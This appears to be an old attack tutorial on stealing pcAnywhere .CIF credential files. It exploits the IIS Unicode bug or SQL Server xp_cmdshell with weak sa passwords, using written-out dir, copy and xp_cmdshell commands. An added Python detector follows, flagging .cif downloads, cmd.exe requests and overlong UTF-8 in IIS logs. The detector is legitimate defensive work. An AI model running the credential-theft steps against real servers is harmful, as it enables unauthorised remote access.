Comments: NT machines generally use pcAnywhere for remote management, while Win2K machines generally use terminal services. Therefore, if you can obtain the account and password for a pcAnywhere remote connection, you can connect to the host remotely. The key to the problem is to obtain the pcAnywhere password file (*.CIF) and then use the pcAnywhere password viewing tool (http://www.csdn.net/soft/openfile.asp?Kind=2&id=7824) to recover the account and password.
pcAnywhere Server listens on port 5631. You can use
telnet 10.10.10.10 5631
to determine whether pcAnywhere Server is enabled on the remote host.
There are two ways to obtain the pcAnywhere password file:
Method 1: Unicode vulnerability + pcAnywhere password viewing tool
The following uses a Unicode tool to demonstrate how the Unicode vulnerability is used to obtain the pcAnywhere password file (*.CIF).
Download tools:
pcAnywhere 9.2: http://www.symantec.com/ (the downloaded pcAnywhere 9.2 is only valid for a limited period)
The procedure is as follows:
1. Find the *.CIF file on the host.
2. Copy the file to the website directory.
3. Use IE to download the file.
4. Use PcanywherePWD to obtain the user name and password.
5. Connect and log on.
Procedure:
1. Find the *.CIF file on the host
Run the command dir c:\*.cif /s
Generally, Citempl.cif is the default password file, so the file we need is SA.CIF.
2. Copy the file to the website directory
To find the website directory, use the command dir c:\Tscontent.gif /s
Once you know the directory, for example c:\inetpub\wwwroot\, and the directory of the password file, c:\Program Files\pcANYWHERE\DATA, run the copy command; the output "1 file(s) copied" indicates that the copy succeeded.
3. Use IE to download the file
Use http://1.1.1.1/sa.cif to download the file.
4. Use the pcAnywhere password viewing tool to get the user name and password
5. Connect remotely
Method 2: SQL Server + pcAnywhere password viewing tool
Because the SQL Server sa password on some websites is usually blank, "sa", or the same as the domain name, if you can connect to the host's database remotely you can also obtain the password file:
The method is as follows:
Use xp_cmdshell 'dir c:\*.cif /s' to find the password file, then copy it to the website directory:
xp_cmdshell 'copy c:\pcanywhere\sa.cif c:\inetpub\wwwroot'
Download it and obtain the user name and password.
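Both methods above end the same way: a pcAnywhere *.cif file is copied into the IIS web root and then fetched over HTTP, so that is where a defender can look for evidence. The following is an added example (not part of the original post) that shows two such checks: scanning IIS W3C-format log lines for .cif downloads, command-interpreter references, decoded path traversal and overlong UTF-8 escapes (the encoding trick behind the Unicode bug), and walking a web root for stray .cif files that should never be web-served. The log lines, the reduced W3C field set and the demo web root are all constructed for the example.

```python
"""Defender-side checks for the .cif exposure path described above (added example)."""
import os
import re
import tempfile
from urllib.parse import unquote_to_bytes

# Constructed sample IIS log (W3C extended format, reduced field set).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-01 10:00:01 10.1.1.5 GET /index.htm - 200
2001-05-01 10:00:09 10.1.1.77 GET /scripts/%2e%2e/winnt/system32/cmd.exe /c+dir 200
2001-05-01 10:00:40 10.1.1.77 GET /sa.cif - 200
2001-05-01 10:01:02 10.1.1.5 GET /images/logo.gif - 200
2001-05-01 10:01:30 10.1.1.77 GET /default.asp %c0%80 404
"""

CIF_RE = re.compile(r"\.cif$", re.IGNORECASE)


def has_overlong_utf8(raw: bytes) -> bool:
    """0xC0 and 0xC1 can never start a valid UTF-8 sequence; they only occur in
    overlong encodings, which is what the IIS Unicode traversal relied on."""
    return any(b in (0xC0, 0xC1) for b in raw)


def parse_w3c(lines):
    """Yield one dict per data line, using the most recent #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def classify(entry):
    """Return the list of reasons this request is suspicious (empty if clean)."""
    reasons = []
    stem_raw = unquote_to_bytes(entry.get("cs-uri-stem", ""))
    query_raw = unquote_to_bytes(entry.get("cs-uri-query", ""))
    stem = stem_raw.decode("utf-8", errors="replace").lower()
    query = query_raw.decode("utf-8", errors="replace").lower()
    if CIF_RE.search(stem):
        reasons.append("pcanywhere .cif fetched over http")
    if "cmd.exe" in stem or "cmd.exe" in query:
        reasons.append("command interpreter referenced in request")
    if ".." in stem:
        reasons.append("path traversal after decoding")
    if has_overlong_utf8(stem_raw) or has_overlong_utf8(query_raw):
        reasons.append("overlong utf-8 in request")
    return reasons


def scan_log(text):
    """Return (client ip, uri stem, reasons) for every suspicious entry, in log order."""
    hits = []
    for entry in parse_w3c(text.splitlines()):
        reasons = classify(entry)
        if reasons:
            hits.append((entry["c-ip"], entry["cs-uri-stem"], reasons))
    return hits


def find_stray_cif(webroot):
    """Relative, forward-slash paths of every .cif under the web root. pcAnywhere keeps
    its connection files in its own DATA directory, so any .cif here is downloadable
    and should not exist."""
    found = []
    for dirpath, _, names in os.walk(webroot):
        for name in names:
            if name.lower().endswith(".cif"):
                rel = os.path.relpath(os.path.join(dirpath, name), webroot)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def build_demo_webroot():
    """Constructed web root in a temp dir: one legitimate page, two stray .cif files."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "sub"))
    for rel in ("index.htm", "sa.cif", os.path.join("sub", "backup.CIF")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("demo\n")
    return root


if __name__ == "__main__":
    for ip, uri, why in scan_log(SAMPLE_LOG):
        print(ip, uri, "; ".join(why))
    print(find_stray_cif(build_demo_webroot()))
```

On a real server the log scan runs over the files under the IIS log directory and the web-root walk over the site's home directory; a hit from either check is a reason to rotate the pcAnywhere credentials stored in the exposed .cif as well as to patch the entry point.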